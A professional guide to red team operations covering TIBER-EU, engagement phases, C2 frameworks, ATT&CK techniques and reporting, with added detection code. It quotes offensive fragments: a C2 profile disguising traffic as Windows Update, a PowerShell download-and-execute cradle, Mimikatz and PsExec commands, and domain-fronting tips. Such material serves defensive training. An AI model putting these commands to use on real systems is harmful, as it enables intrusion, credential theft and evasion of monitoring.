Red Teaming: Conducting Attack Simulations Professionally
Comprehensive Guide to Red Team Operations: Differences from penetration testing, the TIBER-EU framework, red team phases (from reconnaissance to reporting), C2 infrastructure, commonly used TTPs, and how organizations benefit from red team engagements.
Red teaming is the most realistic form of security assessment: A specialized team simulates a real, targeted attack—using the same methods, tools, and mindset that actual attacker groups would employ. Unlike a penetration test, there is no defined scope and no pre-agreed target—only the mission: "Get your hands on the crown jewels."
Red Team vs. Penetration Test
Penetration Test:
Scope: Defined scope (e.g., 5 IP ranges, 2 web applications)
Goal: Find as many technical vulnerabilities as possible
Duration: 5–30 days
Knowledge: Often gray-box (login credentials, source code known)
Blue Team: Knows that the test is taking place (white-box or gray-box)
Outcome: List of all vulnerabilities found + recommendations
Red Team Operation:
Scope: Entire organization (people, processes, technology)
Goal: Reach the "crown jewels" (e.g., compromise AD, read production database, take over CEO account)
Duration: 4–12 weeks
Knowledge: Black-box (like a real attacker)
Blue Team: Does NOT know that the exercise is underway! (testing actual detection)
Outcome: Realistic assessment of detection and response capabilities
When to use penetration testing, when to use Red Team?
Penetration testing when:
→ Testing new systems before go-live
→ Compliance requirements (ISO 27001, PCI DSS)
→ Checking for known security vulnerabilities
→ Limited resources (budget, time)
Red Team when:
→ Mature security organization (SOC in place!)
→ To test detection and response capabilities
→ Realistic attacker simulation (APT level)
→ TIBER-EU / DORA compliance (financial sector)
→ As the next step after multiple successful penetration tests
TIBER-EU - Red Teaming in the Financial Sector
TIBER-EU (Threat Intelligence-based Ethical Red Teaming):
→ Developed by the ECB and national central banks
→ Mandatory for systemically important financial institutions (DORA compliance)
→ In Germany: TIBER-DE (Bundesbank implementation)
→ NIS2: Critical infrastructures face increasingly similar requirements
TIBER-EU Phases:
Phase 1 - Generic Threat Intelligence:
→ Threat intelligence provider analyzes: Which attacker groups typically target institutions of this type and size?
→ Output: Threat Landscape Report (TLR)
Phase 2 - Targeted Threat Intelligence:
→ Specific research on the institution: Which systems? Which employees? Which attack vectors?
→ Output: Targeted Threat Intelligence (TTI) Report
Phase 3 - Red Team Test:
→ 12-week simulation using TTI-based scenarios
→ Realistic APT methods (MITRE ATT&CK)
→ Blue Team is unaware that the test is underway!
Phase 4 - Closure:
→ Findings are shared with the Blue Team
→ Remediation plan created
→ Certificate / Purple Team Session
TIBER-EU Deliverables:
→ Scoped Red Team Test Report (confidential)
→ Purple Team Report (MITRE ATT&CK Coverage)
→ Remediation Tracker
Red Team Phases - PTES Extension for Full Scope
Phase 1: Pre-Engagement (2–4 weeks)
→ Define Rules of Engagement (RoE):
- What can be simulated? (Ransomware? DDoS? Physical intrusion?)
- Get-out-of-jail card: Who to call if an alarm is triggered?
- Emergency Stop: Criteria for immediate termination
- Scoping: Which systems are out of scope? (Production databases?)
→ Define Crown Jewels (with management):
"What is the worst thing an attacker could succeed in doing?"
→ Gather threat intelligence about the organization
Phase 2: OSINT and external reconnaissance (1–2 weeks)
→ LinkedIn: Employees, technologies, IT service providers
→ OSINT: Public code repositories, paste sites, dark web
→ Shodan/Censys: External attack surface
→ Domain reconnaissance: Subdomains, MX, SPF, DKIM
→ Credential leaks: HaveIBeenPwned, dark web search
Phase 3: Attempting initial access (2–4 weeks)
→ Spear-phishing campaign using OSINT findings
→ Password spraying on VPN/OWA (leaked credentials)
→ Exploitation of public services (web apps, VPN CVEs)
→ Physical access (social engineering, badge cloning)
→ Supply chain (third-party access)
Phase 4: Post-exploitation and lateral movement (2–4 weeks)
→ Privilege escalation: from user to admin to domain admin
→ Credential harvesting: Mimikatz, LaZagne, browser passwords
→ Lateral Movement: PsExec, WMI, Pass-the-Hash
→ Persistence: Registry, Scheduled Tasks, Golden Ticket
→ Maintain C2 communication
Phase 5: Accessing Crown Jewels
→ Achieve defined objectives:
- Full AD compromise (DCSync, Domain Admin)
- Access to production database
- Read CEO’s mailbox
- Deploy ransomware on test machine
→ Document all steps (timestamps, screenshots)
Phase 6: Reporting and Purple Team
→ Executive Summary: “We achieved X in Y weeks”
→ Technical Report: each TTP with evidence
→ MITRE ATT&CK Navigator: which TTPs were used/detected?
→ Purple Team Session: Blue Team sees what Red Team did
→ Remediation: joint action plan
C2 Framework - Command and Control
C2 (Command and Control) is the Red Team’s communication infrastructure:
→ Implants on compromised systems
→ Encrypted connection to the C2 server
→ Send commands, exfiltrate data, maintain persistence
Professional C2 Frameworks (for authorized red teaming only!):
Cobalt Strike:
→ Gold standard for red teams
→ Beacon: modular implant (HTTP/HTTPS/DNS/SMB communication)
→ Malleable C2 Profiles: Beacon mimics legitimate traffic
→ Commercial, expensive (~$3,500/year per user)
→ Also abused by ransomware groups!
Havoc (Open Source Alternative):
→ Python-based C2 (similar to Cobalt Strike)
→ Free, actively developed
→ Less easily detected by EDR systems (since it’s newer)
Mythic (Open Source):
→ Modular C2 framework with web UI
→ 70+ agents (payloads) available
→ Multi-operator support for large red teams
Brute Ratel C4 (BRc4):
→ Commercial, developed by former EDR engineers
→ Specifically designed to bypass EDR
---
Malleable C2 Profiles (Disguising Beacon Traffic):
By default: Beacon sends HTTP requests that look like Cobalt Strike
→ EDR and NDR detect this pattern!
With Malleable Profiles: Traffic looks like a legitimate service
# Example: Traffic disguised as a Microsoft Update
http-get {
    set uri "/windowsupdate/v6/GetManifest.aspx";
    client {
        header "Host" "update.microsoft.com";
        header "User-Agent" "Windows-Update-Agent/10.0.10011.16384";
        metadata {
            base64url;
            parameter "CatalogID";
        }
    }
}
→ NDR sees: normal HTTP traffic to a domain resembling microsoft.com
→ In reality: C2 communication with Red Team server
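A detection sketch for the disguise described above, added here as an example and not part of the original article: a profile can set any Host header, but it cannot change where the packets go, so a proxy or NDR sensor can compare the claimed host with the IPs that DNS actually returned for it. The log records, field names and IP addresses are constructed.

```python
# Added example: flag HTTP requests whose Host header claims a domain
# that never resolved to the destination IP (all data below is constructed).
from collections import defaultdict

# Constructed passive-DNS answers: (queried name, returned IP).
DNS_ANSWERS = [
    ("update.microsoft.com", "198.51.100.10"),
    ("update.microsoft.com", "198.51.100.11"),
    ("intranet.example.org", "192.0.2.20"),
]

# Constructed proxy/NDR records.
HTTP_LOG = [
    {"src": "10.0.0.5", "dst_ip": "198.51.100.10",
     "host": "update.microsoft.com", "uri": "/windowsupdate/v6/GetManifest.aspx"},
    {"src": "10.0.0.7", "dst_ip": "203.0.113.66",
     "host": "update.microsoft.com", "uri": "/windowsupdate/v6/GetManifest.aspx"},
    {"src": "10.0.0.9", "dst_ip": "203.0.113.80",
     "host": "never-resolved.example", "uri": "/"},
]

def build_resolution_map(answers):
    """Map each normalized DNS name to the set of IPs it resolved to."""
    resolved = defaultdict(set)
    for name, ip in answers:
        resolved[name.lower().rstrip(".")].add(ip)
    return resolved

def find_host_mismatches(http_log, answers):
    """Return records whose Host header is not backed by an observed DNS answer."""
    resolved = build_resolution_map(answers)
    findings = []
    for rec in http_log:
        host = rec["host"].lower().split(":")[0].rstrip(".")
        known_ips = resolved.get(host)
        if known_ips is None:
            reason = "host never seen in DNS"  # no lookup preceded the request
        elif rec["dst_ip"] not in known_ips:
            reason = "destination IP not among DNS answers for host"
        else:
            continue
        findings.append({"src": rec["src"], "host": host,
                         "dst_ip": rec["dst_ip"], "reason": reason})
    return findings

if __name__ == "__main__":
    for finding in find_host_mismatches(HTTP_LOG, DNS_ANSWERS):
        print(finding)
```

Where traffic leaves through a CDN or forward proxy, the destination IP belongs to that intermediary, so run the comparison at a sensor that still sees the original destination.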
---
C2 Infrastructure Setup (Team Server):
Red Team Server (VPS with cloud provider):
→ Redirector in front (prevents direct C2 IP fingerprinting)
→ CDN usage (Cloudflare) for camouflage
→ Domain fronting (domain belongs to CDN, traffic goes to C2)
Domain Selection:
→ Aged domain (> 1 year old) → better reputation
→ "Categorized" in web proxy databases (e.g., as "Business")
→ Similar to legitimate domains (microsoft-update.net instead of c2.evil.com)
Common Red Team TTPs
MITRE ATT&CK techniques frequently used by Red Teams:
Initial Access:
T1566.001 Spear Phishing Attachment:
→ Word/Excel with macros or ISO file
→ HTML Smuggling: Payload is assembled in the browser
T1190 Exploit Public-Facing Application:
→ Log4Shell, Citrix, Exchange ProxyLogon
Execution:
T1059.001 PowerShell:
→ Cradles: IEX (New-Object Net.WebClient).downloadString("http://...")
→ AMSI Bypass: Bypassing the antivirus scanner
T1059.003 Windows Command Shell
Persistence:
T1053.005 Scheduled Task:
→ schtasks /create /tn "Windows Defender Update" /tr "..."
T1547.001 Registry Run Keys
Privilege Escalation:
T1078 Valid Accounts (Stolen Credentials)
T1134 Access Token Manipulation
Defense Evasion:
T1562.001 Impair Defenses: Disable AV
T1070.004 File Deletion: Delete Event Logs
T1027 Obfuscated Files or Information
Credential Access:
T1003.001 LSASS Memory (Mimikatz):
sekurlsa::logonpasswords
T1558.003 Kerberoasting:
Request Service Tickets → Offline Crack
Lateral Movement:
T1021.002 SMB/Windows Admin Shares (PsExec):
psexec \\target -u admin -p hash cmd.exe
T1021.006 Windows Remote Management (WinRM):
Enter-PSSession -ComputerName target
Exfiltration:
T1048 Exfiltration Over Alternative Protocol:
→ DNS Tunneling (dnscat2, iodine)
→ ICMP Tunneling (icmpsh)
T1041 Exfiltration Over C2 Channel
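The command lines quoted in the list above double as detection content. The following added example (not from the original article) matches constructed process-creation events against patterns derived from those commands and tags each hit with the technique ID the article gives; the event format and the regexes are assumptions, not a vendor rule set.

```python
import re

# (technique ID as listed in the article, label, pattern over the command line)
RULES = [
    ("T1059.001", "PowerShell download cradle",
     re.compile(r"net\.webclient.*download(string|file)", re.I)),
    ("T1053.005", "Scheduled task creation",
     re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)),
    ("T1003.001", "Mimikatz LSASS credential dump",
     re.compile(r"sekurlsa::logonpasswords", re.I)),
    ("T1021.002", "PsExec remote execution",
     re.compile(r"\bpsexec(64)?(\.exe)?\b\s+\\\\\S+", re.I)),
    ("T1021.006", "PowerShell remoting session",
     re.compile(r"\bEnter-PSSession\b.*-ComputerName\b", re.I)),
]

# Constructed process-creation events (host name plus full command line).
EVENTS = [
    {"host": "WS01", "cmd": "powershell -nop -c \"IEX (New-Object Net.WebClient)"
                            ".downloadString('http://placeholder.invalid/a')\""},
    {"host": "WS01", "cmd": 'schtasks /create /tn "Windows Defender Update" '
                            '/tr "C:\\placeholder.exe"'},
    {"host": "SRV02", "cmd": r"psexec \\SRV03 -u admin cmd.exe"},
    {"host": "WS04", "cmd": "schtasks /query /fo list"},  # benign: must not match
    {"host": "WS05", "cmd": "powershell Enter-PSSession -ComputerName SRV03"},
]

def detect(events, rules=RULES):
    """Return (host, technique ID, label) for every rule hit, in event order."""
    hits = []
    for ev in events:
        for tid, label, pattern in rules:
            if pattern.search(ev["cmd"]):
                hits.append((ev["host"], tid, label))
    return hits

def techniques_seen(events):
    """Distinct technique IDs observed, for feeding a coverage report."""
    return sorted({tid for _, tid, _ in detect(events)})

if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
```

String matching like this only catches unobfuscated use (see T1027 in the list), so treat it as a baseline to validate during the Purple Team session rather than as complete coverage.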
Red Team Report - Structure
Executive Summary (2–3 pages):
→ Timeframe and scope
→ Objectives and whether/how they were achieved
→ Critical findings in 3–5 bullet points
→ Overall risk assessment
→ Most important immediate actions
Attack Narrative (Core Section):
→ Chronological sequence of the attack
→ "Day 1: Spear-phishing email sent to 3 targets..."
→ "Day 7: Domain admin compromised via Kerberoasting..."
→ Screenshots, timestamps, evidence
→ Understandable for non-technical readers!
Technical Findings:
→ Each finding includes:
- MITRE ATT&CK technique (T-number)
- CVSS score
- Evidence (screenshot, log excerpt)
- Immediate action
- Long-term action
MITRE ATT&CK coverage:
→ Which TTPs were used?
→ Which ones did the Blue Team detect?
→ Which ones did the Blue Team NOT detect?
→ Navigator export for visualization
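The coverage questions above, and the Navigator item in Phase 6, reduce to a small computation over the engagement log. This added example (not from the original article) derives the used, detected and missed sets and emits an ATT&CK Navigator layer; the engagement records are constructed, and the layer version numbers are assumptions to match to your Navigator instance.

```python
import json

# Constructed engagement log: technique used by the Red Team and whether the
# Blue Team raised an alert for that use during the exercise.
ENGAGEMENT = [
    {"technique": "T1566.001", "day": 1, "detected": False},
    {"technique": "T1059.001", "day": 2, "detected": True},
    {"technique": "T1053.005", "day": 3, "detected": False},
    {"technique": "T1558.003", "day": 7, "detected": False},
    {"technique": "T1021.002", "day": 9, "detected": True},
    {"technique": "T1021.002", "day": 12, "detected": False},  # second use, missed
]

def coverage(engagement):
    """A technique counts as detected if any of its uses raised an alert."""
    used, detected = set(), set()
    for rec in engagement:
        used.add(rec["technique"])
        if rec["detected"]:
            detected.add(rec["technique"])
    rate = len(detected) / len(used) if used else 0.0
    return {"used": sorted(used), "detected": sorted(detected),
            "missed": sorted(used - detected), "detection_rate": round(rate, 2)}

def navigator_layer(engagement, name="Red Team exercise coverage"):
    """Build a Navigator layer dict: green = detected, red = used but missed."""
    cov = coverage(engagement)
    techniques = []
    for tid in cov["used"]:
        hit = tid in cov["detected"]
        techniques.append({
            "techniqueID": tid,
            "score": 1 if hit else 0,
            "color": "#8ec843" if hit else "#e60d0d",
            "comment": "detected by Blue Team" if hit else "used, not detected",
        })
    return {
        "name": name,
        "domain": "enterprise-attack",
        # Assumed version numbers; align them with your Navigator deployment.
        "versions": {"layer": "4.5", "navigator": "4.9.1", "attack": "14"},
        "techniques": techniques,
    }

if __name__ == "__main__":
    print(json.dumps(coverage(ENGAGEMENT), indent=2))
    print(json.dumps(navigator_layer(ENGAGEMENT), indent=2))
```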
Remediation Roadmap:
→ Immediate actions (< 7 days): close critical gaps
→ Short-term (< 30 days): key hardening
→ Medium-term (< 90 days): structural improvements
→ Long-term (< 1 year): architectural improvements
About the Author
M.Sc. in IT Security with more than 5 years of experience in offensive security analysis. Leads the execution of penetration tests, specializing in web applications, network infrastructure, reverse engineering and hardware security. Responsible for several responsible disclosures.